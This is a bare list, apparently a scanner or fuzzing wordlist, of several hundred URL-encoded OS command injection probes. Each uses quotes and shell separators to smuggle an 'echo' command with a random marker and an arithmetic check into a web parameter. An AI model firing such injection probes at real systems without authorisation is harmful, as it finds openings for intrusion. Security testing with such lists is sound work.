+os-command-injection,''|echo$IFSFRUDYQ$((30%2B6))$(echo$IFSFRUDYQ)FRUDYQ|' +os-command-injection,''||echo$IFSACFFZC$((29%2B51))$(echo$IFSACFFZC)ACFFZC|' +os-command-injection,''&&echo$IFSDSTIDD$((87%2B89))$(echo$IFSDSTIDD)DSTIDD|' +os-command-injection,''%0aecho$IFSOMOAWG$((37%2B16))$(echo$IFSOMOAWG)OMOAWG|' +os-command-injection,''%3Becho$IFSAWTTNW$((97%2B93))$(echo$IFSAWTTNW)AWTTNW|' +os-command-injection,''%26echo$IFSYOYHYT$((87%2B32))$(echo$IFSYOYHYT)YOYHYT|' +os-command-injection,''%26%26echo$IFSOSNMTB$((17%2B53))$(echo$IFSOSNMTB)OSNMTB|' +os-command-injection,''%7Cecho$IFSRSOBXL$((32%2B20))$(echo$IFSRSOBXL)RSOBXL|' +os-command-injection,''%7C%7Cecho$IFSIYFUTC$((35%2B6))$(echo$IFSIYFUTC)IYFUTC|' +os-command-injection,''echo$IFSZAZMGS$((53%2B59))$(echo$IFSZAZMGS)ZAZMGS%27' +os-command-injection,''%20echo%20DHZGBM$((36%2B86))$(echo%20DHZGBM)DHZGBM%27' +os-command-injection,'';echo$IFSTVUUPM$((41%2B77))$(echo$IFSTVUUPM)TVUUPM%27' +os-command-injection,''&echo$IFSQKZYPP$((55%2B27))$(echo$IFSQKZYPP)QKZYPP%27' +os-command-injection,''|echo$IFSMTYEZK$((2%2B28))$(echo$IFSMTYEZK)MTYEZK%27' +os-command-injection,''||echo$IFSUYEKYZ$((46%2B2))$(echo$IFSUYEKYZ)UYEKYZ%27' +os-command-injection,''&&echo$IFSUGEJWF$((34%2B81))$(echo$IFSUGEJWF)UGEJWF%27' +os-command-injection,''%0aecho$IFSCSOREC$((72%2B24))$(echo$IFSCSOREC)CSOREC%27' +os-command-injection,''%3Becho$IFSXQAHUL$((9%2B99))$(echo$IFSXQAHUL)XQAHUL%27' +os-command-injection,''%26echo$IFSYKAMSD$((84%2B71))$(echo$IFSYKAMSD)YKAMSD%27' +os-command-injection,''%26%26echo$IFSYILVWF$((53%2B73))$(echo$IFSYILVWF)YILVWF%27' +os-command-injection,''%7Cecho$IFSDZZJRA$((36%2B84))$(echo$IFSDZZJRA)DZZJRA%27' +os-command-injection,''%7C%7Cecho$IFSXSKAQD$((19%2B93))$(echo$IFSXSKAQD)XSKAQD%27' +os-command-injection,''echo$IFSQUCSSY$((71%2B59))$(echo$IFSQUCSSY)QUCSSY%22' +os-command-injection,''%20echo%20SZQVUT$((92%2B45))$(echo%20SZQVUT)SZQVUT%22' +os-command-injection,'';echo$IFSRXCILT$((66%2B76))$(echo$IFSRXCILT)RXCILT%22' +os-command-injection,''&echo$IFSQYHHIE$((90%2B44))$(echo$IFSQYHHIE)QYHHIE%22' +os-command-injection,''|echo$IFSUDMWDN$((49%2B29))$(echo$IFSUDMWDN)UDMWDN%22' +os-command-injection,''||echo$IFSCOBRKP$((22%2B48))$(echo$IFSCOBRKP)COBRKP%22' +os-command-injection,''&&echo$IFSRXIGIR$((86%2B76))$(echo$IFSRXIGIR)RXIGIR%22' +os-command-injection,''%0aecho$IFSKNXEIF$((67%2B64))$(echo$IFSKNXEIF)KNXEIF%22' +os-command-injection,''%3Becho$IFSGKNHWZ$((67%2B92))$(echo$IFSGKNHWZ)GKNHWZ%22' +os-command-injection,''%26echo$IFSZZQBNP$((52%2B31))$(echo$IFSZZQBNP)ZZQBNP%22' +os-command-injection,''%26%26echo$IFSRGMUUX$((81%2B39))$(echo$IFSRGMUUX)RGMUUX%22' +os-command-injection,''%7Cecho$IFSGRFQBP$((21%2B44))$(echo$IFSGRFQBP)GRFQBP%22' +os-command-injection,''%7C%7Cecho$IFSYIJMHI$((78%2B15))$(echo$IFSYIJMHI)YIJMHI%22' +os-command-injection,''echo$IFSATMXIQ$((94%2B83))$(echo$IFSATMXIQ)ATMXIQ%5C%5C' +os-command-injection,''%20echo%20QIIZIS$((83%2B28))$(echo%20QIIZIS)QIIZIS%5C%5C' +os-command-injection,'';echo$IFSOGZZLG$((82%2B8))$(echo$IFSOGZZLG)OGZZLG%5C%5C' +os-command-injection,''&echo$IFSSFRDQJ$((5%2B47))$(echo$IFSSFRDQJ)SFRDQJ%5C%5C' +os-command-injection,''|echo$IFSBLUOBR$((48%2B93))$(echo$IFSBLUOBR)BLUOBR%5C%5C' +os-command-injection,''||echo$IFSWPLOYN$((11%2B61))$(echo$IFSWPLOYN)WPLOYN%5C%5C' +os-command-injection,''&&echo$IFSEEAOWX$((31%2B37))$(echo$IFSEEAOWX)EEAOWX%5C%5C' +os-command-injection,''%0aecho$IFSMRGXMQ$((93%2B20))$(echo$IFSMRGXMQ)MRGXMQ%5C%5C' +os-command-injection,''%3Becho$IFSZIXZTA$((54%2B19))$(echo$IFSZIXZTA)ZIXZTA%5C%5C' +os-command-injection,''%26echo$IFSQJCJTG$((15%2B71))$(echo$IFSQJCJTG)QJCJTG%5C%5C' +os-command-injection,''%26%26echo$IFSWGUUQS$((22%2B59))$(echo$IFSWGUUQS)WGUUQS%5C%5C' +os-command-injection,''%7Cecho$IFSNOZCLT$((80%2B49))$(echo$IFSNOZCLT)NOZCLT%5C%5C' +os-command-injection,''%7C%7Cecho$IFSFOGUOT$((12%2B4))$(echo$IFSFOGUOT)FOGUOT%5C%5C' +os-command-injection,''echo$IFSFMBTIT$((34%2B36))$(echo$IFSFMBTIT)FMBTIT%2F%2F' +os-command-injection,''%20echo%20LCUPUI$((67%2B12))$(echo%20LCUPUI)LCUPUI%2F%2F' +os-command-injection,'';echo$IFSYSBEUY$((50%2B96))$(echo$IFSYSBEUY)YSBEUY%2F%2F' +os-command-injection,''&echo$IFSGOHLRL$((41%2B27))$(echo$IFSGOHLRL)GOHLRL%2F%2F' +os-command-injection,''|echo$IFSLBYJEO$((76%2B85))$(echo$IFSLBYJEO)LBYJEO%2F%2F' +os-command-injection,''||echo$IFSBGABHN$((68%2B69))$(echo$IFSBGABHN)BGABHN%2F%2F' +os-command-injection,''&&echo$IFSARLFCX$((76%2B3))$(echo$IFSARLFCX)ARLFCX%2F%2F' +os-command-injection,''%0aecho$IFSJVJBOI$((72%2B33))$(echo$IFSJVJBOI)JVJBOI%2F%2F' +os-command-injection,''%3Becho$IFSYYDENG$((25%2B38))$(echo$IFSYYDENG)YYDENG%2F%2F' +os-command-injection,''%26echo$IFSSGWYGH$((17%2B18))$(echo$IFSSGWYGH)SGWYGH%2F%2F' +os-command-injection,''%26%26echo$IFSQGCAOI$((72%2B57))$(echo$IFSQGCAOI)QGCAOI%2F%2F' +os-command-injection,''%7Cecho$IFSHISNBC$((79%2B7))$(echo$IFSHISNBC)HISNBC%2F%2F' +os-command-injection,''%7C%7Cecho$IFSZFQBBS$((42%2B5))$(echo$IFSZFQBBS)ZFQBBS%2F%2F' +os-command-injection,''echo$IFSMDCMCB$((27%2B53))$(echo$IFSMDCMCB)MDCMCB%26' +os-command-injection,''%20echo%20CXKSQZ$((18%2B22))$(echo%20CXKSQZ)CXKSQZ%26' +os-command-injection,'';echo$IFSPICODU$((19%2B82))$(echo$IFSPICODU)PICODU%26' +os-command-injection,''&echo$IFSCHNLIU$((42%2B39))$(echo$IFSCHNLIU)CHNLIU%26' +os-command-injection,''|echo$IFSGCIZYI$((9%2B92))$(echo$IFSGCIZYI)GCIZYI%26' +os-command-injection,''||echo$IFSNWOOGT$((48%2B45))$(echo$IFSNWOOGT)NWOOGT%26' +os-command-injection,''&&echo$IFSZRWXZK$((81%2B67))$(echo$IFSZRWXZK)ZRWXZK%26' +os-command-injection,''%0aecho$IFSWTIGNL$((88%2B19))$(echo$IFSWTIGNL)WTIGNL%26' +os-command-injection,''%3Becho$IFSGOOQAC$((3%2B23))$(echo$IFSGOOQAC)GOOQAC%26' +os-command-injection,''%26echo$IFSCAIGIC$((51%2B44))$(echo$IFSCAIGIC)CAIGIC%26' +os-command-injection,''%26%26echo$IFSBGZLBN$((42%2B92))$(echo$IFSBGZLBN)BGZLBN%26' +os-command-injection,''%7Cecho$IFSALJRYG$((7%2B49))$(echo$IFSALJRYG)ALJRYG%26' +os-command-injection,''%7C%7Cecho$IFSTXFGBP$((28%2B0))$(echo$IFSTXFGBP)TXFGBP%26' +os-command-injection,''echo$IFSXCUTCE$((23%2B12))$(echo$IFSXCUTCE)XCUTCE%7C' +os-command-injection,''%20echo%20UHJUHS$((68%2B93))$(echo%20UHJUHS)UHJUHS%7C' +os-command-injection,'';echo$IFSKZCKOJ$((33%2B6))$(echo$IFSKZCKOJ)KZCKOJ%7C' +os-command-injection,''&echo$IFSKFDAKU$((72%2B93))$(echo$IFSKFDAKU)KFDAKU%7C' +os-command-injection,''|echo$IFSNAFNWQ$((47%2B44))$(echo$IFSNAFNWQ)NAFNWQ%7C' +os-command-injection,''||echo$IFSTVWVBO$((17%2B96))$(echo$IFSTVWVBO)TVWVBO%7C' +os-command-injection,''&&echo$IFSYZQQKL$((73%2B37))$(echo$IFSYZQQKL)YZQQKL%7C' +os-command-injection,''%0aecho$IFSMOMQCI$((63%2B38))$(echo$IFSMOMQCI)MOMQCI%7C' +os-command-injection,''%3Becho$IFSRTEEYZ$((93%2B75))$(echo$IFSRTEEYZ)RTEEYZ%7C' +os-command-injection,''%26echo$IFSZYAICF$((49%2B53))$(echo$IFSZYAICF)ZYAICF%7C' +os-command-injection,''%26%26echo$IFSZZSVXZ$((46%2B81))$(echo$IFSZZSVXZ)ZZSVXZ%7C' +os-command-injection,''%7Cecho$IFSOIATXB$((46%2B82))$(echo$IFSOIATXB)OIATXB%7C' +os-command-injection,''%7C%7Cecho$IFSYOKPWL$((89%2B42))$(echo$IFSYOKPWL)YOKPWL%7C' +os-command-injection,'"echo$IFSWKATIV$((60%2B61))$(echo$IFSWKATIV)WKATIV' +os-command-injection,'"%20echo%20CWUIKD$((41%2B30))$(echo%20CWUIKD)CWUIKD' +os-command-injection,'";echo$IFSJQUSPM$((11%2B2))$(echo$IFSJQUSPM)JQUSPM' +os-command-injection,'"&echo$IFSVJUTHP$((96%2B68))$(echo$IFSVJUTHP)VJUTHP' +os-command-injection,'"|echo$IFSGCRAHC$((53%2B91))$(echo$IFSGCRAHC)GCRAHC' +os-command-injection,'"||echo$IFSCCZBZV$((42%2B82))$(echo$IFSCCZBZV)CCZBZV' +os-command-injection,'"&&echo$IFSJOVRVD$((49%2B70))$(echo$IFSJOVRVD)JOVRVD' +os-command-injection,'"%0aecho$IFSBJURAW$((1%2B97))$(echo$IFSBJURAW)BJURAW' +os-command-injection,'"%3Becho$IFSSTVHDV$((56%2B21))$(echo$IFSSTVHDV)STVHDV' +os-command-injection,'"%26echo$IFSKWABXB$((17%2B13))$(echo$IFSKWABXB)KWABXB' +os-command-injection,'"%26%26echo$IFSBVWEHE$((52%2B69))$(echo$IFSBVWEHE)BVWEHE' +os-command-injection,'"%7Cecho$IFSMHELRN$((54%2B12))$(echo$IFSMHELRN)MHELRN' +os-command-injection,'"%7C%7Cecho$IFSJPDBGK$((58%2B46))$(echo$IFSJPDBGK)JPDBGK' +os-command-injection,'"echo$IFSHHTXHL$((49%2B36))$(echo$IFSHHTXHL)HHTXHL'' +os-command-injection,'"%20echo%20NTZGVY$((19%2B34))$(echo%20NTZGVY)NTZGVY'' +os-command-injection,'";echo$IFSWBYLKV$((50%2B27))$(echo$IFSWBYLKV)WBYLKV'' +os-command-injection,'"&echo$IFSKWIQTS$((57%2B77))$(echo$IFSKWIQTS)KWIQTS'' +os-command-injection,'"|echo$IFSVXVEBJ$((90%2B87))$(echo$IFSVXVEBJ)VXVEBJ'' +os-command-injection,'"||echo$IFSUGINJP$((61%2B39))$(echo$IFSUGINJP)UGINJP'' +os-command-injection,'"&&echo$IFSCVWJPC$((74%2B17))$(echo$IFSCVWJPC)CVWJPC'' +os-command-injection,'"%0aecho$IFSSGWCNL$((73%2B94))$(echo$IFSSGWCNL)SGWCNL'' +os-command-injection,'"%3Becho$IFSVRATKU$((73%2B43))$(echo$IFSVRATKU)VRATKU'' +os-command-injection,'"%26echo$IFSSDEPLL$((89%2B42))$(echo$IFSSDEPLL)SDEPLL'' +os-command-injection,'"%26%26echo$IFSRXEECQ$((1%2B1))$(echo$IFSRXEECQ)RXEECQ'' +os-command-injection,'"%7Cecho$IFSZQOGYN$((31%2B70))$(echo$IFSZQOGYN)ZQOGYN'' +os-command-injection,'"%7C%7Cecho$IFSRHCEJU$((43%2B33))$(echo$IFSRHCEJU)RHCEJU'' +os-command-injection,'"echo$IFSVORHKR$((32%2B24))$(echo$IFSVORHKR)VORHKR"' +os-command-injection,'"%20echo%20WFBQGI$((90%2B90))$(echo%20WFBQGI)WFBQGI"' +os-command-injection,'";echo$IFSGDUPZJ$((65%2B72))$(echo$IFSGDUPZJ)GDUPZJ"' +os-command-injection,'"&echo$IFSYFXZZL$((57%2B13))$(echo$IFSYFXZZL)YFXZZL"' +os-command-injection,'"|echo$IFSAWVDZZ$((61%2B5))$(echo$IFSAWVDZZ)AWVDZZ"' +os-command-injection,'"||echo$IFSXECQXX$((94%2B39))$(echo$IFSXECQXX)XECQXX"' +os-command-injection,'"&&echo$IFSEQTTBQ$((35%2B0))$(echo$IFSEQTTBQ)EQTTBQ"' +os-command-injection,'"%0aecho$IFSPHPXFU$((67%2B50))$(echo$IFSPHPXFU)PHPXFU"' +os-command-injection,'"%3Becho$IFSVICXTN$((37%2B41))$(echo$IFSVICXTN)VICXTN"' +os-command-injection,'"%26echo$IFSWXTKDI$((17%2B67))$(echo$IFSWXTKDI)WXTKDI"' +os-command-injection,'"%26%26echo$IFSRPIHYW$((91%2B37))$(echo$IFSRPIHYW)RPIHYW"' +os-command-injection,'"%7Cecho$IFSUDEEGX$((28%2B85))$(echo$IFSUDEEGX)UDEEGX"' +os-command-injection,'"%7C%7Cecho$IFSZMOHUU$((94%2B69))$(echo$IFSZMOHUU)ZMOHUU"' +os-command-injection,'"echo$IFSONMQKM$((22%2B28))$(echo$IFSONMQKM)ONMQKM' +os-command-injection,'"%20echo%20UUXKTB$((57%2B32))$(echo%20UUXKTB)UUXKTB' +os-command-injection,'";echo$IFSVYMVPZ$((67%2B64))$(echo$IFSVYMVPZ)VYMVPZ' +os-command-injection,'"&echo$IFSGFEHZK$((68%2B85))$(echo$IFSGFEHZK)GFEHZK' +os-command-injection,'"|echo$IFSIQCTBX$((54%2B92))$(echo$IFSIQCTBX)IQCTBX' +os-command-injection,'"||echo$IFSYDFXUN$((70%2B11))$(echo$IFSYDFXUN)YDFXUN' +os-command-injection,'"&&echo$IFSKOPNEP$((92%2B7))$(echo$IFSKOPNEP)KOPNEP' +os-command-injection,'"%0aecho$IFSDWMULK$((25%2B34))$(echo$IFSDWMULK)DWMULK' +os-command-injection,'"%3Becho$IFSHCBWBH$((0%2B48))$(echo$IFSHCBWBH)HCBWBH' +os-command-injection,'"%26echo$IFSPSTQXK$((12%2B96))$(echo$IFSPSTQXK)PSTQXK' +os-command-injection,'"%26%26echo$IFSMCAKIV$((64%2B5))$(echo$IFSMCAKIV)MCAKIV' +os-command-injection,'"%7Cecho$IFSNOSUCK$((35%2B11))$(echo$IFSNOSUCK)NOSUCK' +os-command-injection,'"%7C%7Cecho$IFSCERCHU$((13%2B46))$(echo$IFSCERCHU)CERCHU' +os-command-injection,'"echo$IFSETATEF$((80%2B79))$(echo$IFSETATEF)ETATEF//' +os-command-injection,'"%20echo%20HWUZPQ$((82%2B33))$(echo%20HWUZPQ)HWUZPQ//' +os-command-injection,'";echo$IFSLFGEOY$((22%2B44))$(echo$IFSLFGEOY)LFGEOY//' +os-command-injection,'"&echo$IFSZVPWKP$((79%2B81))$(echo$IFSZVPWKP)ZVPWKP//' +os-command-injection,'"|echo$IFSXSEOTZ$((78%2B18))$(echo$IFSXSEOTZ)XSEOTZ//' +os-command-injection,'"||echo$IFSTCCUHM$((72%2B61))$(echo$IFSTCCUHM)TCCUHM//' +os-command-injection,'"&&echo$IFSWPYOYT$((86%2B46))$(echo$IFSWPYOYT)WPYOYT//' +os-command-injection,'"%0aecho$IFSEIOLQJ$((69%2B36))$(echo$IFSEIOLQJ)EIOLQJ//' +os-command-injection,'"%3Becho$IFSXVUYIQ$((97%2B2))$(echo$IFSXVUYIQ)XVUYIQ//' +os-command-injection,'"%26echo$IFSDYXXSS$((94%2B60))$(echo$IFSDYXXSS)DYXXSS//' +os-command-injection,'"%26%26echo$IFSYMBKLY$((55%2B32))$(echo$IFSYMBKLY)YMBKLY//' +os-command-injection,'"%7Cecho$IFSVHLPZW$((76%2B16))$(echo$IFSVHLPZW)VHLPZW//' +os-command-injection,'"%7C%7Cecho$IFSLZOZUN$((8%2B81))$(echo$IFSLZOZUN)LZOZUN//' +os-command-injection,'"echo$IFSSYFQAU$((37%2B78))$(echo$IFSSYFQAU)SYFQAU\' +os-command-injection,'"%20echo%20GEWHYE$((65%2B76))$(echo%20GEWHYE)GEWHYE\' +os-command-injection,'";echo$IFSSXCKTB$((75%2B80))$(echo$IFSSXCKTB)SXCKTB\' +os-command-injection,'"&echo$IFSWZXINW$((50%2B11))$(echo$IFSWZXINW)WZXINW\' +os-command-injection,'"|echo$IFSJTANTD$((65%2B98))$(echo$IFSJTANTD)JTANTD\' +os-command-injection,'"||echo$IFSJIAXIU$((62%2B56))$(echo$IFSJIAXIU)JIAXIU\' +os-command-injection,'"&&echo$IFSOONZCK$((32%2B38))$(echo$IFSOONZCK)OONZCK\' +os-command-injection,'"%0aecho$IFSRFLPIG$((74%2B10))$(echo$IFSRFLPIG)RFLPIG\' +os-command-injection,'"%3Becho$IFSHBDBVM$((41%2B30))$(echo$IFSHBDBVM)HBDBVM\' +os-command-injection,'"%26echo$IFSOUNXWG$((62%2B52))$(echo$IFSOUNXWG)OUNXWG\' +os-command-injection,'"%26%26echo$IFSVZSMDF$((4%2B77))$(echo$IFSVZSMDF)VZSMDF\' +os-command-injection,'"%7Cecho$IFSLHIZNN$((66%2B97))$(echo$IFSLHIZNN)LHIZNN\' +os-command-injection,'"%7C%7Cecho$IFSAEEFTZ$((12%2B71))$(echo$IFSAEEFTZ)AEEFTZ\' +os-command-injection,'"echo$IFSGOPZNT$((61%2B76))$(echo$IFSGOPZNT)GOPZNT&' +os-command-injection,'"%20echo%20WVCQTP$((98%2B15))$(echo%20WVCQTP)WVCQTP&' +os-command-injection,'";echo$IFSZCTRZI$((60%2B12))$(echo$IFSZCTRZI)ZCTRZI&' +os-command-injection,'"&echo$IFSNMBAUD$((42%2B5))$(echo$IFSNMBAUD)NMBAUD&' +os-command-injection,'"|echo$IFSXDHKIF$((56%2B17))$(echo$IFSXDHKIF)XDHKIF&' +os-command-injection,'"||echo$IFSUQNTQG$((30%2B73))$(echo$IFSUQNTQG)UQNTQG&' +os-command-injection,'"&&echo$IFSMMQAGA$((77%2B46))$(echo$IFSMMQAGA)MMQAGA&' +os-command-injection,'"%0aecho$IFSBPLBPT$((48%2B38))$(echo$IFSBPLBPT)BPLBPT&' +os-command-injection,'"%3Becho$IFSERJEHG$((25%2B7))$(echo$IFSERJEHG)ERJEHG&' +os-command-injection,'"%26echo$IFSDGFAYX$((17%2B31))$(echo$IFSDGFAYX)DGFAYX&' +os-command-injection,'"%26%26echo$IFSTIIXMB$((16%2B84))$(echo$IFSTIIXMB)TIIXMB&' +os-command-injection,'"%7Cecho$IFSNXFWKE$((5%2B33))$(echo$IFSNXFWKE)NXFWKE&' +os-command-injection,'"%7C%7Cecho$IFSPDWJEU$((34%2B84))$(echo$IFSPDWJEU)PDWJEU&' +os-command-injection,'"echo$IFSKQIOUW$((81%2B20))$(echo$IFSKQIOUW)KQIOUW|' +os-command-injection,'"%20echo%20GBJIVY$((45%2B22))$(echo%20GBJIVY)GBJIVY|' +os-command-injection,'";echo$IFSBIJBTP$((50%2B41))$(echo$IFSBIJBTP)BIJBTP|' +os-command-injection,'"&echo$IFSOCYGAQ$((67%2B93))$(echo$IFSOCYGAQ)OCYGAQ|' +os-command-injection,'"|echo$IFSLNNHJW$((48%2B51))$(echo$IFSLNNHJW)LNNHJW|' +os-command-injection,'"||echo$IFSOOLSUP$((60%2B80))$(echo$IFSOOLSUP)OOLSUP|' +os-command-injection,'"&&echo$IFSIKGBUU$((70%2B68))$(echo$IFSIKGBUU)IKGBUU|' +os-command-injection,'"%0aecho$IFSYQRSAJ$((55%2B18))$(echo$IFSYQRSAJ)YQRSAJ|' +os-command-injection,'"%3Becho$IFSYFIRUN$((89%2B93))$(echo$IFSYFIRUN)YFIRUN|' +os-command-injection,'"%26echo$IFSTQUHGT$((51%2B9))$(echo$IFSTQUHGT)TQUHGT|' +os-command-injection,'"%26%26echo$IFSMZMLZV$((47%2B52))$(echo$IFSMZMLZV)MZMLZV|' +os-command-injection,'"%7Cecho$IFSYTBSTS$((24%2B38))$(echo$IFSYTBSTS)YTBSTS|' +os-command-injection,'"%7C%7Cecho$IFSIVBZDH$((37%2B28))$(echo$IFSIVBZDH)IVBZDH|' +os-command-injection,'"echo$IFSBYGLDF$((54%2B66))$(echo$IFSBYGLDF)BYGLDF%27' +os-command-injection,'"%20echo%20JKBAUZ$((16%2B4))$(echo%20JKBAUZ)JKBAUZ%27' +os-command-injection,'";echo$IFSQTBMHG$((67%2B82))$(echo$IFSQTBMHG)QTBMHG%27' +os-command-injection,'"&echo$IFSEFVKLM$((89%2B68))$(echo$IFSEFVKLM)EFVKLM%27' +os-command-injection,'"|echo$IFSTRBJHF$((51%2B94))$(echo$IFSTRBJHF)TRBJHF%27' +os-command-injection,'"||echo$IFSRJOBXI$((9%2B83))$(echo$IFSRJOBXI)RJOBXI%27' +os-command-injection,'"&&echo$IFSAVKTLV$((14%2B43))$(echo$IFSAVKTLV)AVKTLV%27' +os-command-injection,'"%0aecho$IFSOCKHHF$((36%2B24))$(echo$IFSOCKHHF)OCKHHF%27' +os-command-injection,'"%3Becho$IFSVWLOPP$((73%2B16))$(echo$IFSVWLOPP)VWLOPP%27' +os-command-injection,'"%26echo$IFSJNESPQ$((88%2B93))$(echo$IFSJNESPQ)JNESPQ%27' +os-command-injection,'"%26%26echo$IFSTXPRBJ$((40%2B83))$(echo$IFSTXPRBJ)TXPRBJ%27' +os-command-injection,'"%7Cecho$IFSAZYLZZ$((51%2B97))$(echo$IFSAZYLZZ)AZYLZZ%27' +os-command-injection,'"%7C%7Cecho$IFSWGMPYH$((66%2B86))$(echo$IFSWGMPYH)WGMPYH%27' +os-command-injection,'"echo$IFSWOMGRC$((0%2B46))$(echo$IFSWOMGRC)WOMGRC%22' +os-command-injection,'"%20echo%20TCQTDE$((89%2B22))$(echo%20TCQTDE)TCQTDE%22' +os-command-injection,'";echo$IFSZRNVWQ$((61%2B2))$(echo$IFSZRNVWQ)ZRNVWQ%22' +os-command-injection,'"&echo$IFSFNFBIK$((62%2B22))$(echo$IFSFNFBIK)FNFBIK%22' +os-command-injection,'"|echo$IFSIWKOFU$((23%2B55))$(echo$IFSIWKOFU)IWKOFU%22' +os-command-injection,'"||echo$IFSVSJPYU$((58%2B8))$(echo$IFSVSJPYU)VSJPYU%22' +os-command-injection,'"&&echo$IFSULAPAW$((32%2B88))$(echo$IFSULAPAW)ULAPAW%22' +os-command-injection,'"%0aecho$IFSKNQUII$((48%2B98))$(echo$IFSKNQUII)KNQUII%22' +os-command-injection,'"%3Becho$IFSGAHIQG$((68%2B82))$(echo$IFSGAHIQG)GAHIQG%22' +os-command-injection,'"%26echo$IFSSWZDEK$((23%2B62))$(echo$IFSSWZDEK)SWZDEK%22' +os-command-injection,'"%26%26echo$IFSMDMXCZ$((12%2B2))$(echo$IFSMDMXCZ)MDMXCZ%22' +os-command-injection,'"%7Cecho$IFSRGIMYI$((25%2B41))$(echo$IFSRGIMYI)RGIMYI%22' +os-command-injection,'"%7C%7Cecho$IFSKRLDUJ$((29%2B25))$(echo$IFSKRLDUJ)KRLDUJ%22' +os-command-injection,'"echo$IFSZTLCXA$((92%2B39))$(echo$IFSZTLCXA)ZTLCXA%5C%5C' +os-command-injection,'"%20echo%20NNFNUJ$((32%2B42))$(echo%20NNFNUJ)NNFNUJ%5C%5C' +os-command-injection,'";echo$IFSNOILCW$((35%2B50))$(echo$IFSNOILCW)NOILCW%5C%5C' +os-command-injection,'"&echo$IFSIZIKXP$((4%2B56))$(echo$IFSIZIKXP)IZIKXP%5C%5C' +os-command-injection,'"|echo$IFSDKKFUX$((53%2B64))$(echo$IFSDKKFUX)DKKFUX%5C%5C' +os-command-injection,'"||echo$IFSONWUBF$((85%2B46))$(echo$IFSONWUBF)ONWUBF%5C%5C' +os-command-injection,'"&&echo$IFSYBFPVK$((15%2B44))$(echo$IFSYBFPVK)YBFPVK%5C%5C' +os-command-injection,'"%0aecho$IFSCOKBAQ$((26%2B6))$(echo$IFSCOKBAQ)COKBAQ%5C%5C' +os-command-injection,'"%3Becho$IFSMCZBTD$((19%2B12))$(echo$IFSMCZBTD)MCZBTD%5C%5C' +os-command-injection,'"%26echo$IFSFGSFXK$((50%2B67))$(echo$IFSFGSFXK)FGSFXK%5C%5C' +os-command-injection,'"%26%26echo$IFSMGZYUX$((69%2B27))$(echo$IFSMGZYUX)MGZYUX%5C%5C' +os-command-injection,'"%7Cecho$IFSZOHIKN$((60%2B22))$(echo$IFSZOHIKN)ZOHIKN%5C%5C' +os-command-injection,'"%7C%7Cecho$IFSWVBHRV$((70%2B26))$(echo$IFSWVBHRV)WVBHRV%5C%5C' +os-command-injection,'"echo$IFSTDYQVX$((81%2B75))$(echo$IFSTDYQVX)TDYQVX%2F%2F' +os-command-injection,'"%20echo%20MDJMHU$((0%2B77))$(echo%20MDJMHU)MDJMHU%2F%2F' +os-command-injection,'";echo$IFSJMVDKT$((29%2B56))$(echo$IFSJMVDKT)JMVDKT%2F%2F' +os-command-injection,'"&echo$IFSHAWFWE$((23%2B63))$(echo$IFSHAWFWE)HAWFWE%2F%2F' +os-command-injection,'"|echo$IFSNPJOUL$((60%2B57))$(echo$IFSNPJOUL)NPJOUL%2F%2F' +os-command-injection,'"||echo$IFSTJIKIW$((44%2B78))$(echo$IFSTJIKIW)TJIKIW%2F%2F' +os-command-injection,'"&&echo$IFSOLYCAK$((57%2B64))$(echo$IFSOLYCAK)OLYCAK%2F%2F' +os-command-injection,'"%0aecho$IFSRSKGDD$((67%2B8))$(echo$IFSRSKGDD)RSKGDD%2F%2F' +os-command-injection,'"%3Becho$IFSEKSIGH$((71%2B77))$(echo$IFSEKSIGH)EKSIGH%2F%2F' +os-command-injection,'"%26echo$IFSEQHFOG$((96%2B31))$(echo$IFSEQHFOG)EQHFOG%2F%2F' +os-command-injection,'"%26%26echo$IFSEOCQFN$((57%2B12))$(echo$IFSEOCQFN)EOCQFN%2F%2F' +os-command-injection,'"%7Cecho$IFSRCWERA$((82%2B63))$(echo$IFSRCWERA)RCWERA%2F%2F' +os-command-injection,'"%7C%7Cecho$IFSUHQPMD$((69%2B4))$(echo$IFSUHQPMD)UHQPMD%2F%2F' +os-command-injection,'"echo$IFSITSADJ$((94%2B48))$(echo$IFSITSADJ)ITSADJ%26' +os-command-injection,'"%20echo%20FBOBLU$((92%2B42))$(echo%20FBOBLU)FBOBLU%26' +os-command-injection,'";echo$IFSAJPXYF$((20%2B50))$(echo$IFSAJPXYF)AJPXYF%26' +os-command-injection,'"&echo$IFSUZTQCV$((96%2B22))$(echo$IFSUZTQCV)UZTQCV%26' +os-command-injection,'"|echo$IFSIGVJXX$((65%2B58))$(echo$IFSIGVJXX)IGVJXX%26' +os-command-injection,'"||echo$IFSMTADSX$((4%2B83))$(echo$IFSMTADSX)MTADSX%26' +os-command-injection,'"&&echo$IFSITCFYR$((58%2B9))$(echo$IFSITCFYR)ITCFYR%26' +os-command-injection,'"%0aecho$IFSYBTXPF$((15%2B35))$(echo$IFSYBTXPF)YBTXPF%26' +os-command-injection,'"%3Becho$IFSVELPDH$((10%2B78))$(echo$IFSVELPDH)VELPDH%26' +os-command-injection,'"%26echo$IFSTYVQZP$((31%2B21))$(echo$IFSTYVQZP)TYVQZP%26' +os-command-injection,'"%26%26echo$IFSFWROXW$((61%2B7))$(echo$IFSFWROXW)FWROXW%26' +os-command-injection,'"%7Cecho$IFSQWRACU$((69%2B14))$(echo$IFSQWRACU)QWRACU%26' +os-command-injection,'"%7C%7Cecho$IFSROIMQV$((24%2B28))$(echo$IFSROIMQV)ROIMQV%26' +os-command-injection,'"echo$IFSNIKGBF$((93%2B83))$(echo$IFSNIKGBF)NIKGBF%7C' +os-command-injection,'"%20echo%20KCONLL$((35%2B55))$(echo%20KCONLL)KCONLL%7C' +os-command-injection,'";echo$IFSPUUABZ$((55%2B91))$(echo$IFSPUUABZ)PUUABZ%7C' +os-command-injection,'"&echo$IFSHZEEMN$((80%2B42))$(echo$IFSHZEEMN)HZEEMN%7C' +os-command-injection,'"|echo$IFSCDYIRQ$((76%2B46))$(echo$IFSCDYIRQ)CDYIRQ%7C' +os-command-injection,'"||echo$IFSZGHLKC$((8%2B4))$(echo$IFSZGHLKC)ZGHLKC%7C' +os-command-injection,'"&&echo$IFSMNOJXK$((12%2B14))$(echo$IFSMNOJXK)MNOJXK%7C' +os-command-injection,'"%0aecho$IFSRZUUUX$((19%2B70))$(echo$IFSRZUUUX)RZUUUX%7C' +os-command-injection,'"%3Becho$IFSCHRPGA$((61%2B12))$(echo$IFSCHRPGA)CHRPGA%7C' +os-command-injection,'"%26echo$IFSJQOKUV$((22%2B52))$(echo$IFSJQOKUV)JQOKUV%7C' +os-command-injection,'"%26%26echo$IFSDQZQSK$((47%2B7))$(echo$IFSDQZQSK)DQZQSK%7C' 